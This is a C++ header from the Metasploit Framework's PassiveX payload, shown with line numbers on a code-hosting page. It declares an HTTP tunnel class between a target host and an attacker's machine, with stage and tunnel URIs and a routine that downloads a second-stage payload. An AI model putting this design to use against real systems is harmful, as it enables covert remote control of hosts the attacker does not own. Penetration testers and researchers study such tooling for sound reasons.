Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
/*
2
 * This file is part of the Metasploit Exploit Framework
3
 * and is subject to the same licenses and copyrights as
4
 * the rest of this package.
5
 */
6
#ifndef _PASSIVEX_HTTPTUNNEL_H
7
#define _PASSIVEX_HTTPTUNNEL_H
8

9
#define PASSIVEX_URI_SECOND_STAGE TEXT("/stage")
10
#define PASSIVEX_URI_TUNNEL_IN    TEXT("/tunnel_in")
11
#define PASSIVEX_URI_TUNNEL_OUT   TEXT("/tunnel_out")
12

13
#define PROFILE_CHECKPOINT(x) \
14
	CPassiveX::Log("%s:%d:%lu: %s\n", __FILE__, __LINE__, GetTickCount(), x)
15
	
16

17
/*
18
 * This class is responsible for managing the HTTP tunnel between a target host
19
 * and the local machine.
20
 */
21
class HttpTunnel
22
{
23
	public:
24
		HttpTunnel();
25
		~HttpTunnel();
26

27
		// Initialization
28
		DWORD Start(
29
				IN LPSTR HttpHost,
30
				IN LPSTR HttpUriBase,
31
				IN LPSTR HttpSid,
32
				IN USHORT HttpPort);
33
		DWORD Stop();
34
	protected:
35
		// Internal Initialization
36
		DWORD InitializeLocalConnection();
37

38
		// Second stage loader
39
		VOID DownloadSecondStage();
40

41
		// Data transmission
42
		DWORD TransmitToRemote(
43
				IN PUCHAR Buffer,
44
				IN ULONG BufferSize);
45
		DWORD TransmitToLocal(
46
				IN PUCHAR Buffer,
47
				IN ULONG BufferSize);
48

49
		DWORD TransmitHttpRequest(
50
				IN LPTSTR Method,
51
				IN LPTSTR Uri,
52
				IN PVOID RequestPayload = NULL,
53
				IN ULONG RequestPayloadLength = 0,
54
				IN ULONG WaitResponseTimeout = 0,
55
				OUT LPDWORD ResponseCode = NULL,
56
				OUT PVOID *ResponsePayload = NULL,
57
				OUT LPDWORD ResponsePayloadLength = NULL);
58

59
		// Thread functions
60
		static ULONG SendThreadFuncSt(
61
				IN HttpTunnel *Tunnel);
62
		ULONG SendThreadFunc();
63
		static ULONG ReceiveThreadFuncSt(
64
				IN HttpTunnel *Tunnel);
65
		ULONG ReceiveThreadFunc();
66

67
		static ULONG SecondStageThreadFuncSt(
68
				IN HttpTunnel *Tunnel);
69

70
		/**************
71
		 * Attributes *
72
		 **************/
73

74
		// Remote host information
75
		LPSTR     HttpHost;
76
		LPSTR     HttpUriBase;
77
		LPSTR     HttpSid;
78
		USHORT    HttpPort;
79

80
		// Sockets
81
		WSADATA   WsaData;
82
		SOCKET    LocalTcpListener;
83
		SOCKET    LocalTcpClientSide;
84
		SOCKET    LocalTcpServerSide;
85

86
		// Internet context
87
		HINTERNET InternetHandle;
88

89
		// Stage attributes
90
		PUCHAR    SecondStage;
91
		DWORD     SecondStageSize;
92

93
		// Threads
94
		HANDLE    SendThread;
95
		HANDLE    ReceiveThread;
96
		HANDLE    SecondStageThread;
97
};
98

99
#endif
100

101